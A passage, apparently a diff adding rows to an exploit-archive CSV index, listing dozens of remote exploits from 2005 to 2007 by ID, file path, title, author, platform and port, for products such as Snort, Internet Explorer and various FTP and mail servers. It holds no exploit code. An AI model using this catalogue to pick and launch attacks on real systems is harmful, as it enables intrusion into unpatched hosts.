Overflow",2005-10-10,egm,remote,windows,5250 +1247,exploits/linux/remote/1247.pl,"phpBB 2.0.13 - 'admin_styles.php' Remote Command Execution",2005-10-11,RusH,remote,linux, +1258,exploits/linux/remote/1258.php,"e107 < 0.6172 - 'resetcore.php' SQL Injection",2005-10-18,rgod,remote,linux, +1259,exploits/hp-ux/remote/1259.pm,"HP-UX FTP Server - Unauthenticated Directory Listing (Metasploit)",2005-10-19,Optyx,remote,hp-ux, +1260,exploits/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",remote,windows,80 +1261,exploits/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",remote,hp-ux,515 +1262,exploits/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM 'log_security()' Remote Stack Overflow (Metasploit)",2005-10-19,"H D Moore",remote,windows,4105 +1263,exploits/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",remote,multiple,13722 +1264,exploits/win_x86/remote/1264.pl,"Veritas NetBackup 6.0 (Windows x86) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",remote,win_x86,13722 +1265,exploits/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - 'bpjava-msvc' Remote Command Execution",2005-10-20,"Kevin Finisterre",remote,osx,13722 +1272,exploits/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,remote,linux, +1277,exploits/windows/remote/1277.c,"Mirabilis ICQ 2003a - Remote Buffer Overflow Download Shellcode",2005-10-29,ATmaCA,remote,windows, +1279,exploits/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",remote,windows, +1288,exploits/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow",2005-11-02,xwings,remote,linux, +1290,exploits/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - 'friendsd2' Remote Format String",2005-11-04,"Kevin Finisterre",remote,linux, +1291,exploits/lin_x86/remote/1291.pl,"gpsdrive 2.09 (x86) - 'friendsd2' Remote Format String",2005-11-04,"Kevin Finisterre",remote,lin_x86, +1292,exploits/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - 'SITE' Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",remote,multiple,21 +1295,exploits/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution",2005-11-05,kingcope,remote,linux,21 +1313,exploits/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (3)",2005-11-11,xort,remote,windows, +1314,exploits/linux/remote/1314.rb,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (4)",2005-11-11,xwings,remote,linux, +1330,exploits/windows/remote/1330.c,"freeFTPd 1.0.8 - 'USER' Remote Buffer Overflow",2005-11-17,Expanders,remote,windows,21 +1332,exploits/windows/remote/1332.pm,"MailEnable 1.54 Pro - Universal IMAPD W3C Logging Buffer Overflow (Metasploit)",2005-11-20,y0,remote,windows,143 +1333,exploits/hardware/remote/1333.pm,"Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)",2005-11-20,"H D Moore",remote,hardware,80 +1352,exploits/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote (PoC) (MS05-051) (2)",2005-12-01,Swan,remote,windows, +1355,exploits/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth - 'syslog()' Remote Format String",2005-12-03,"Kevin Finisterre",remote,linux, +1357,exploits/windows/remote/1357.diff,"WIDCOMM Bluetooth Software < 3.0 - Remote Buffer Overflow",2005-12-04,"Kevin Finisterre",remote,windows, +1365,exploits/windows/remote/1365.pm,"Oracle 9.2.0.1 - Universal XDB HTTP Pass Overflow (Metasploit)",2005-12-08,y0,remote,windows,8080 +1366,exploits/windows/remote/1366.pm,"Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)",2005-12-09,"H D Moore",remote,windows, +1369,exploits/multiple/remote/1369.html,"Mozilla Firefox 1.04 - 'compareTo()' Remote Code Execution",2005-12-12,"Aviv Raff",remote,multiple, +1374,exploits/windows/remote/1374.pl,"Watchfire AppScan QA 5.0.x - Remote Code Execution (PoC)",2005-12-15,"Mariano Nuñez",remote,windows, +1375,exploits/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b - PH SERVER Remote Overflow",2005-12-16,kingcope,remote,windows,105 +1378,exploits/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - 'EXAMINE' Remote Buffer Overflow",2005-12-19,muts,remote,windows, +1380,exploits/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - 'IMAPd' Remote Overflow",2005-12-20,muts,remote,windows,143 +1381,exploits/windows/remote/1381.pm,"Golden FTP Server 1.92 - 'APPE' Remote Overflow (Metasploit)",2005-12-20,redsand,remote,windows,21 +1391,exploits/windows/remote/1391.pm,"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",remote,windows, +1408,exploits/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,remote,windows,80 +1413,exploits/windows/remote/1413.c,"eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (1)",2006-01-12,ZwelL,remote,windows, +1414,exploits/windows/remote/1414.pl,"eStara SoftPhone 3.0.1.46 - SIP Remote Buffer Overflow (2)",2006-01-12,kokanin,remote,windows,5060 +1417,exploits/windows/remote/1417.pl,"Farmers WIFE 4.4 sp1 - 'FTP' Remote System Access",2006-01-14,kokanin,remote,windows,22003 +1420,exploits/windows/remote/1420.c,"Microsoft Windows - Metafile '.WMF' Arbitrary File Download (Generator)",2006-01-15,darkeagle,remote,windows, +1421,exploits/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",remote,windows,13701 +1448,exploits/windows/remote/1448.pl,"KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC)",2006-01-25,"Critical Security",remote,windows, +1452,exploits/windows/remote/1452.pm,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,remote,windows,21 +1456,exploits/linux/remote/1456.c,"SHOUTcast 1.9.4 - File Request 'Leaked' Format String",2006-01-28,crash-x,remote,linux,8000 +1458,exploits/windows/remote/1458.cpp,"Winamp 5.12 - '.pls' Remote Buffer Overflow (1)",2006-01-29,ATmaCA,remote,windows, +1460,exploits/windows/remote/1460.pm,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)",2006-01-31,"H D Moore",remote,windows, +1462,exploits/windows/remote/1462.cpp,"KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,remote,windows,21 +1463,exploits/windows/remote/1463.pm,"SoftiaCom wMailServer 1.0 - SMTP Remote Buffer Overflow (Metasploit)",2006-02-01,y0,remote,windows,21 +1466,exploits/windows/remote/1466.pl,"eXchange POP3 5.0.050203 - RPCT TO Remote Buffer Overflow",2006-02-03,"securma massine",remote,windows,25 +1474,exploits/linux/remote/1474.pm,"Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)",2006-02-07,"H D Moore",remote,linux, +1480,exploits/osx/remote/1480.pm,"Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)",2006-02-08,"H D Moore",remote,osx, +1486,exploits/linux/remote/1486.c,"Power Daemon 2.0.2 - 'WHATIDO' Remote Format String",2006-02-10,"Gotfault Security",remote,linux,532 +1487,exploits/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String",2006-02-10,"Gotfault Security",remote,linux,1589 +1502,exploits/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 < 10 - '.BMP' Heap Overflow (PoC) (MS06-005) (2)",2006-02-16,redsand,remote,windows, +1504,exploits/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)",2006-02-17,"H D Moore",remote,windows, +1505,exploits/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)",2006-02-17,"Matthew Murphy",remote,windows, +1506,exploits/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (2)",2006-02-17,darkeagle,remote,windows, +1519,exploits/osx/remote/1519.pm,"Apple Mac OSX Safari Browser - 'Safe File' Remote Code Execution (Metasploit)",2006-02-22,"H D Moore",remote,osx, +1520,exploits/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow (MS06-006) (3)",2006-02-22,"Matthew Murphy",remote,windows, +1536,exploits/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote (Metasploit)",2006-02-28,"H D Moore",remote,windows, +1537,exploits/windows/remote/1537.pm,"Kerio Personal Firewall 2.1.4 - Remote Authentication Packet Overflow (Metasploit)",2006-02-28,y0,remote,windows,44334 +1565,exploits/windows/remote/1565.pl,"RevilloC MailServer 1.21 - 'USER' Remote Buffer Overflow (PoC)",2006-03-07,"securma massine",remote,windows,110 +1574,exploits/linux/remote/1574.c,"PeerCast 0.1216 - 'nextCGIarg' Remote Buffer Overflow (1)",2006-03-11,prdelka,remote,linux,7144 +1578,exploits/linux/remote/1578.c,"PeerCast 0.1216 - 'nextCGIarg' Remote Buffer Overflow (2)",2006-03-12,darkeagle,remote,linux,7144 +1582,exploits/linux/remote/1582.c,"crossfire-server 1.9.0 - 'SetUp()' Remote Buffer Overflow",2006-03-13,landser,remote,linux,13327 +1583,exploits/osx/remote/1583.pl,"Apple Mac OSX 10.4.5 Mail.app - Real Name Buffer Overflow",2006-03-13,"Kevin Finisterre",remote,osx,25 +1592,exploits/windows/remote/1592.c,"Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (1)",2006-03-19,pLL,remote,windows, +1602,exploits/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - Error Messages Remote Buffer Overflow",2006-03-22,"esca zoo",remote,multiple,11000 +1606,exploits/windows/remote/1606.html,"Microsoft Internet Explorer - 'createTextRang' Remote Code Execution",2006-03-23,darkeagle,remote,windows, +1607,exploits/windows/remote/1607.cpp,"Microsoft Internet Explorer - 'createTextRang' Download Shellcode (1)",2006-03-23,ATmaCA,remote,windows, +1620,exploits/windows/remote/1620.pm,"Microsoft Internet Explorer - 'createTextRang' Remote (Metasploit)",2006-04-01,"Randy Flood",remote,windows, +1626,exploits/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)",2006-03-30,"H D Moore",remote,windows,7144 +1628,exploits/windows/remote/1628.cpp,"Microsoft Internet Explorer - 'createTextRang' Download Shellcode (2)",2006-03-31,ATmaCA,remote,windows, +1664,exploits/windows/remote/1664.py,"Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Remote Buffer Overflow",2006-04-11,"Paul Haas",remote,windows, +1679,exploits/novell/remote/1679.pm,"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)",2006-04-15,"H D Moore",remote,novell,8300 +1681,exploits/windows/remote/1681.pm,"Sybase EAServer 5.2 - WebConsole Remote Stack Overflow (Metasploit)",2006-04-15,Metasploit,remote,windows,8080 +1703,exploits/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password",2006-04-21,"Marc Bevand",remote,windows,8004 +1717,exploits/linux/remote/1717.c,"Fenice Oms 1.10 - GET Remote Buffer Overflow",2006-04-25,c0d3r,remote,linux, +1739,exploits/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - 'parse_xml.cgi' Code Execution",2003-02-24,FOX_MULDER,remote,osx, +1741,exploits/linux/remote/1741.c,"MySQL 5.0.20 - COM_TABLE_DUMP Memory Leak/Remote Buffer Overflow",2006-05-02,"Stefano Di Paola",remote,linux,3306 +1742,exploits/linux/remote/1742.c,"MySQL 4.1.18/5.0.20 - Local/Remote Information Leakage",2006-05-02,"Stefano Di Paola",remote,linux, +1750,exploits/linux/remote/1750.c,"Quake 3 Engine 1.32b - 'R_RemapShader()' Remote Client Buffer Overflow",2006-05-05,landser,remote,linux, +1776,exploits/windows/remote/1776.c,"Medal of Honor - 'getinfo' Remote Buffer Overflow",2006-05-10,RunningBon,remote,windows,12203 +1787,exploits/windows/remote/1787.py,"freeSSHd 1.0.9 - Key Exchange Algorithm Buffer Overflow",2006-05-15,"Tauqeer Ahmad",remote,windows,22 +1788,exploits/windows/remote/1788.pm,"PuTTy.exe 0.53 - Validation Remote Buffer Overflow (Metasploit)",2006-05-15,y0,remote,windows, +1791,exploits/multiple/remote/1791.patch,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass",2006-05-16,redsand,remote,multiple,5900 +1794,exploits/multiple/remote/1794.pm,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)",2006-05-15,"H D Moore",remote,multiple,5900 +1799,exploits/multiple/remote/1799.txt,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Scanner",2006-05-17,class101,remote,multiple, +1813,exploits/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)",2006-05-21,kingcope,remote,linux,110 +1862,exploits/cgi/remote/1862.c,"iShopCart - 'vGetPost()' Remote Buffer Overflow (CGI)",2006-06-02,K-sPecial,remote,cgi, +1885,exploits/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow",2006-06-07,kingcope,remote,windows,80 +1889,exploits/hardware/remote/1889.txt,"D-Link DWL Series Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,remote,hardware, +1906,exploits/windows/remote/1906.py,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow",2006-06-12,h07,remote,windows, +1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,remote,windows, +1940,exploits/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",remote,windows,445 +1965,exploits/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,remote,windows,445 +1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,remote,multiple,10000 +2014,exploits/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow",2006-07-15,"Pablo Isola",remote,windows,515 +2017,exploits/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)",2006-07-15,UmZ,remote,multiple,10000 +2034,exploits/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",remote,hardware, +2047,exploits/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (1)",2006-07-20,"Jacopo Cervini",remote,windows, +2048,exploits/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - 'JBoss' Remote Code Execution",2006-07-20,"Jon Hart",remote,hardware, +2052,exploits/windows/remote/2052.sh,"Microsoft Internet Explorer - MDAC Remote Code Execution (MS06-014)",2006-07-21,redsand,remote,windows, +2053,exploits/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (2)",2006-07-21,bannedit,remote,multiple,110 +2054,exploits/windows/remote/2054.txt,"Microsoft Windows - DHCP Client Broadcast (MS06-036)",2006-07-21,redsand,remote,windows, +2061,exploits/multiple/remote/2061.txt,"Apache Tomcat < 5.5.17 - Remote Directory Listing",2006-07-23,"ScanAlert Security",remote,multiple, +2070,exploits/windows/remote/2070.pl,"SIPfoundry sipXtapi - 'CSeq' Remote Buffer Overflow",2006-07-24,"Jacopo Cervini",remote,windows,5060 +2074,exploits/windows/remote/2074.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)",2006-07-26,ri0t,remote,windows,10616 +2075,exploits/windows/remote/2075.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-07-26,ri0t,remote,windows, +2076,exploits/windows/remote/2076.pl,"AIM Triton 1.0.4 - 'SipXtapi' Remote Buffer Overflow (PoC)",2006-07-26,c0rrupt,remote,windows,5061 +2079,exploits/windows/remote/2079.pl,"eIQnetworks ESA - Syslog Server Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",remote,windows,12345 +2080,exploits/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",remote,windows,10616 +2082,exploits/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)",2006-07-28,"H D Moore",remote,multiple, +2136,exploits/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",remote,hardware, +2140,exploits/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)",2006-08-07,ri0t,remote,windows,10616 +2145,exploits/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-08,PATz,remote,hardware, +2162,exploits/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",remote,windows,445 +2164,exploits/windows/remote/2164.pm,"Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",remote,windows, +2185,exploits/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)",2006-08-14,K-sPecial,remote,linux,110 +2223,exploits/windows/remote/2223.c,"Microsoft Windows - CanonicalizePathName() Remote (MS06-040)",2006-08-19,Preddy,remote,windows,139 +2233,exploits/windows/remote/2233.c,"Texas Imperial Software WFTPD 3.23 - 'SIZE' Remote Buffer Overflow",2006-08-21,h07,remote,windows,21 +2234,exploits/windows/remote/2234.py,"Easy File Sharing FTP Server 2.0 - 'PASS' Remote (PoC)",2006-08-21,h07,remote,windows,21 +2237,exploits/multiple/remote/2237.sh,"Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow",2006-08-21,"Jacobo Avariento",remote,multiple, +2258,exploits/windows/remote/2258.py,"Alt-N MDaemon POP3 Server < 9.06 - 'USER' Remote Heap Overflow",2006-08-26,muts,remote,windows,110 +2265,exploits/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (2)",2006-08-28,ub3rst4r,remote,windows,445 +2274,exploits/linux/remote/2274.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (1)",2006-08-29,Expanders,remote,linux, +2276,exploits/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - ActiveX Remote Code Execution (Metasploit)",2006-08-29,"Francisco Amato",remote,windows, +2277,exploits/windows/remote/2277.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow (2)",2006-08-29,psylocn,remote,windows, +2283,exploits/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - add router Remote Buffer Overflow",2006-09-01,"Andres Tarasco",remote,windows, +2320,exploits/windows/remote/2320.txt,"IBM Director < 5.10 - 'Redirect.bat' Directory Traversal",2006-09-07,"Daniel Clemens",remote,windows,411 +2328,exploits/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - 'SoftParserFileXml' Remote Code Execution",2006-09-08,rgod,remote,windows,80 +2345,exploits/windows/remote/2345.pl,"Mercur MailServer 5.0 SP3 - 'IMAP' Remote Buffer Overflow (2)",2006-09-11,"Jacopo Cervini",remote,windows,143 +2355,exploits/windows/remote/2355.pm,"Microsoft Windows Server 2003 - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",remote,windows,445 +2358,exploits/windows/remote/2358.c,"Microsoft Internet Explorer - COM Object Remote Heap Overflow",2006-09-13,nop,remote,windows, +2401,exploits/windows/remote/2401.c,"Ipswitch WS_FTP LE 5.08 - PASV Response Remote Buffer Overflow",2006-09-20,h07,remote,windows, +2403,exploits/windows/remote/2403.c,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow",2006-09-20,nop,remote,windows, +2408,exploits/windows/remote/2408.pl,"Microsoft Internet Explorer (Windows XP SP1) - 'VML' Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",remote,windows, +2425,exploits/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow",2006-09-24,jamikazu,remote,windows, +2426,exploits/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",remote,windows, +2440,exploits/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",remote,windows, +2445,exploits/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow",2006-09-27,h07,remote,windows,80 +2448,exploits/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() (HTML)",2006-09-28,jamikazu,remote,windows, +2458,exploits/windows/remote/2458.pl,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() (1)",2006-09-29,"YAG KOHHA",remote,windows, +2460,exploits/windows/remote/2460.c,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() (2)",2006-09-29,LukeHack,remote,windows, +2467,exploits/windows/remote/2467.pm,"McAfee ePo 3.5.0 / ProtectionPilot 1.1.0 - Source Remote (Metasploit)",2006-10-01,muts,remote,windows,81 +2482,exploits/windows/remote/2482.pl,"SHTTPD 1.34 - 'POST' Remote Buffer Overflow",2006-10-05,SkOd,remote,windows, +2530,exploits/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow (PoC)",2006-10-12,h07,remote,windows, +2601,exploits/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow",2006-10-19,"Greg Linares",remote,windows,25 +2637,exploits/windows/remote/2637.c,"AEP SmartGate 4.3b - 'GET' Arbitrary File Download",2006-10-24,prdelka,remote,windows,143 +2638,exploits/hardware/remote/2638.c,"Cisco VPN 3000 Concentrator 4.1.7/4.7.2 - 'FTP' Remote File System Access",2006-10-24,prdelka,remote,hardware, +2649,exploits/windows/remote/2649.c,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (1)",2006-10-25,Expanders,remote,windows,25 +2651,exploits/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User",2006-10-25,"Greg Linares",remote,windows, +2657,exploits/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,remote,windows, +2671,exploits/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,remote,windows,8028 +2680,exploits/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",remote,win_x86,80 +2689,exploits/windows/remote/2689.c,"Novell eDirectory 9.0 - 'DHost' Remote Buffer Overflow",2006-10-30,Expanders,remote,windows, +2690,exploits/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer",2006-10-30,"Greg Linares",remote,windows,80 +2699,exploits/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream",2006-11-01,"Greg Linares",remote,windows, +2729,exploits/windows/remote/2729.pm,"Omni-NFS Server 5.2 - 'nfsd.exe' Remote Stack Overflow (Metasploit)",2006-11-06,"Evgeny Legerov",remote,windows,2049 +2743,exploits/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (1)",2006-11-08,anonymous,remote,windows, +2749,exploits/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (2)",2006-11-10,~Fyodor,remote,windows, +2753,exploits/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - XML Core Services Remote Code Execution (3)",2006-11-10,M03,remote,windows, +2770,exploits/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)",2006-11-13,"H D Moore",remote,windows, +2771,exploits/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2006-11-13,"H D Moore",remote,windows, +2784,exploits/multiple/remote/2784.html,"Links 1.00pre12 - 'smbclient' Remote Code Execution",2006-11-14,"Teemu Salmela",remote,multiple, +2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows, +2789,exploits/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,remote,windows, +2800,exploits/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",remote,windows, +2809,exploits/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",remote,windows,445 +2837,exploits/multiple/remote/2837.sql,"Oracle 9i/10g - 'read/write/execute' ation Suite",2006-11-23,"Marco Ivaldi",remote,multiple, +2856,exploits/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",remote,linux,21 +2858,exploits/linux/remote/2858.c,"Evince Document Viewer - 'DocumentMedia' Remote Buffer Overflow",2006-11-28,K-sPecial,remote,linux, +2865,exploits/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow",2006-11-30,cthulhu,remote,windows,69 +2866,exploits/windows/remote/2866.html,"Acer LunchApp.APlunch - ActiveX Control Command Execution",2006-11-30,"Tan Chew Keong",remote,windows, +2870,exploits/windows/remote/2870.rb,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow (Metasploit)",2006-11-30,"Greg Linares",remote,windows, +2887,exploits/windows/remote/2887.pl,"Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - 'Filename' Remote Buffer Overflow",2006-12-03,"Jacopo Cervini",remote,windows,69 +2933,exploits/linux/remote/2933.c,"OpenLDAP 2.4.3 - 'KBIND' Remote Buffer Overflow",2006-12-15,"Solar Eclipse",remote,linux,389 +2936,exploits/linux/remote/2936.pl,"GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution",2006-12-15,kingcope,remote,linux,21 +2951,exploits/multiple/remote/2951.sql,"Oracle 9i/10g - 'extproc' Local/Remote Command Execution",2006-12-19,"Marco Ivaldi",remote,multiple, +2959,exploits/linux/remote/2959.sql,"Oracle 9i/10g - 'utl_file' FileSystem Access",2006-12-19,"Marco Ivaldi",remote,linux, +2974,exploits/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,remote,windows, +3021,exploits/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2)",2003-10-15,"Solar Eclipse",remote,linux,21 +3022,exploits/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote (MS04-007)",2004-03-26,"Solar Eclipse",remote,windows,445 +3037,exploits/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,remote,windows,4002 +3055,exploits/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,remote,windows, +3058,exploits/windows/remote/3058.html,"Rediff Bol Downloader - ActiveX Control Execute Local File",2006-12-31,"Gregory R. Panakkal",remote,windows, +3063,exploits/windows/remote/3063.pl,"Formbankserver 1.9 - 'Name' Directory Traversal",2007-01-01,Bl0od3r,remote,windows, +3064,exploits/multiple/remote/3064.rb,"Apple QuickTime - 'rtsp URL Handler' Remote Stack Buffer Overflow",2007-01-01,MoAB,remote,multiple, +3067,exploits/windows/remote/3067.txt,"QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)",2007-01-01,"Jacopo Cervini",remote,windows,25 +3072,exploits/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Remote Buffer Overflow",2007-01-03,"Winny Thomas",remote,windows, +3077,exploits/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting",2007-01-03,MoAB,remote,osx, +3084,exploits/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - 'acroreader' Cross-Site Scripting",2007-01-05,"Stefano Di Paola",remote,windows, +3086,exploits/windows/remote/3086.py,"CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow",2007-01-05,"Winny Thomas",remote,windows,6502 +3092,exploits/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow (Metasploit)",2007-01-07,"Jacopo Cervini",remote,windows,80 